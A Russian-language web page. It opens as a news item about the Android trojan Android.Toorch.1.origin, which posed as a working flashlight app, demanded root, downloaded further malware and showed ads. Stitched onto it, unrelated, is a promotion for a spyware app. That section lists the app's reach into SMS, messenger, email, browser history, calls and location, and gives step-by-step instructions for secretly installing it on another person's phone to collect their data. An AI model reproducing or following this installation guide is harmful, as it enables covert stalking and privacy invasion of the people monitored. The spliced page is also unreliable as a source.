Вредоносная программа для Android маскировалась под фонарик

1302442418_dr-web Статистика заражений мобильных устройств показывает, что злоумышленники редко используют легитимные и реально работающие программы для распространения своих троянов. В этот раз популярное приложение с функцией фонарика оказалось заражённым. Описываемая ситуация выглядит весьма необычной и интересной, поскольку сообщений от самих пользователей не поступало. Известный антивирус Dr.Web выявил вредоносный код данного ПО, а произошло это после свежего обновления базы угроз.

Особенностью приложения-фонарика являлся запрос прав Root пользователя, что предоставляет возможность работать с привилегиями высочайшего уровня, а также выполнять на целевой системе любой произвольный код. Среди владельцев мобильных устройств подобные требования, исходящие от простого фонарика, никого почему-то не смутили! Как только у приложения появляются права уровня Root администратора, сразу же происходит загрузка вредоносных программ из Сети. Последующий процесс их установки может протекать и в фоне, совершенно незаметно для владельца устройства!

Также троянский конь способен передавать на удалённый сервер любую информацию о мобильном телефоне, после чего отображать на дисплее различные рекламные баннеры. Многие из них умело маскируются под официальную рекламу от Google, поэтому подозрений не вызывают. За приложением могут стоять китайские разработчики, поэтому в смартфонах может появляться реклама именно на этом языке. Подобная ситуация – тревожный звоночек для пользователя, когда нужно незамедлительно предпринимать меры по сканированию и лечению устройства.

Как сообщают исследователи Dr.Web в официальном отчёте, вредонос получил название Android.Toorch.1.origin (по аналогии с программным фонариком, через который распространяется). Заразиться им можно лишь в ситуации, когда человек добровольно произведёт установку приложения. Троянец умело прячется под вполне легитимную программу, поэтому следует ожидать массовых заражений в ближайшее время. Пока же создатели популярного антивируса рекомендуют просканировать память устройства их софтом.

Ещё один интересный факт: программный фонарик действительно работает. Все заявленные в пресс-релизе функции! Поэтому вероятность того, что пользователь заблаговременно обнаружит угрозу, крайне низка. Спасти может лишь программная защита смартфона, наличие актуальных и свежих баз для антивирусов. Информации о том, как реагируют на троян иные защитные ПО, пока не поступало. Лишь Dr.Web заявили об этой угрозе.

Возможности приложения: чтение переписки SMS, MMS, Вконтакте (официальное приложение и Kate Mobile), Одноклассники, Facebook, Мой Мир@mail.ru, ВСети.by, Twitter, Hangouts, Google+, WhatsApp, Skype, Viber, Hangouts (бывший Google Talk), Агент@mail.ru, ICQ, IM+ и IM+Pro, AIM, Jabber, MSN, MySpace, Yahoo! и Я.Онлайн (Яндекс Чат), Email переписку Gmail и Почта@mail.ru, просматривать посещенные сайты в браузерах Chrome, Opera, Firefox. Получить доступ к списку звонков и местонахождению телефона. Это малая часть всех возможностей. Весь список возможностей доступен тут

Видео руководство по установке для любого телефона:

Видео руководство по установке на телефон с ROOT правами:

Инструкция по установке и настройке:

  1. Заводим личный кабинет по этой ссылке: «Завести личный кабинет» (просто регистрируемся там).
  2. Заходим по этой ссылке: «Войти в личный кабинет на сайте» и вводим Email и пароль, которые указали пре регистрации.
  3. Жмем кнопку: «Добавить телефон»
  4. Заполняем все поля которые просят ввести. Заполняем правильно как там написано, иначе не будет работать.
  5. Жмем кнопку «Сохранить».
  6. Читаем инструкцию которая появилась после нажатия кнопки «Сохранить»
  7. Устанавливаем на телефон, (тот с которого нужно получить информацию) приложение, и настраиваем его согласно инструкции, которую вы должны будете прочитать на шаге 6.
  8. Приложение установлено. Все хорошо. Разработчики пишут, что надо подождать не менее часа, чтоб данные начали поступать в ваш личный кабинет который вы завели на шаге 1. В нашем случае данные пришли через 4 часа. Задуманное удалось! Желаю успехов.